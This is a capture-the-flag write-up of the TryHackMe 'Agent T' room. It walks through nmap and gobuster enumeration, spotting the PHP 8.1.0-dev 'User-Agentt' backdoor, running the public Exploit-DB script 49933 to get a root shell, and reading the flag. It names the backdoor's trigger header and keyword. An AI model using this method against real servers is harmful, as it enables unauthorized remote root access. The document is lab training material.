THM - Agent T
Index
1. Executive Summary
| Target Info | Details |
|---|---|
| Room Name | Agent T |
| Difficulty | Info / Easy |
| Target IP | target-ip |
| Operating System | Linux (Ubuntu 20.04) |
| Vulnerability | PHP 8.1.0-dev Backdoor (User-Agentt Remote Code Execution) |
| Privilege Level Obtained | root |
2. Reconnaissance & Enumeration
Network Scanning
An initial port scan using nmap was conducted across all TCP ports to identify running services and version information:
sudo nmap -p- -sV -sC target-ip

Nmap Results:
- Port 80/tcp: Open — Running
PHP cli server 5.5 or later (PHP 8.1.0-dev) - HTTP Title:
Admin Dashboard
Web Reconnaissance
Navigating to http://targe-ip in the browser reveals an active Admin Dashboard application.

A directory enumeration scan was initiated using gobuster:
gobuster dir -u http://target-ip/ -w /usr/share/wordlists/dirb/common.txt

During enumeration, the server responded with wildcard response behavior across non-existing paths, shifting focus back to the core technology stack identified in the initial port scan.
3. Vulnerability Assessment
From the nmap scan output, the server was identified as running *PHP 8.1.0-dev.

This specific development build of PHP contains a known backdoor vulnerability in its source code (discovered in early 2021), where sending an HTTP header containing User-Agentt with the keyword zerodium allows arbitrary system command execution.
- Exploit Database Reference: EDB-ID
49933 - Vulnerability Type: Remote Code Execution (RCE) / Backdoor
- Exploit Name:
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
4. Exploitation
Using the public exploit script 49933.py sourced from Exploit-DB, an interactive shell was executed against the target target server:
python 49933.py
Enter the full host url:
http://target-ip/
Interactive shell is opened on http://target-ip/
$ whoami
root

Because the PHP process was executed under the elevated system context, immediate access was granted as the root user without requiring further privilege escalation.
5. Flag Recovery
With initial access established directly as root, the filesystem was searched for text files:
find / -type f -name "*.txt" 2>/dev/null

The location of the root flag was identified at /flag.txt. Reading the file provided the final challenge flag:
$ cat /flag.txt
flag{the-flag}
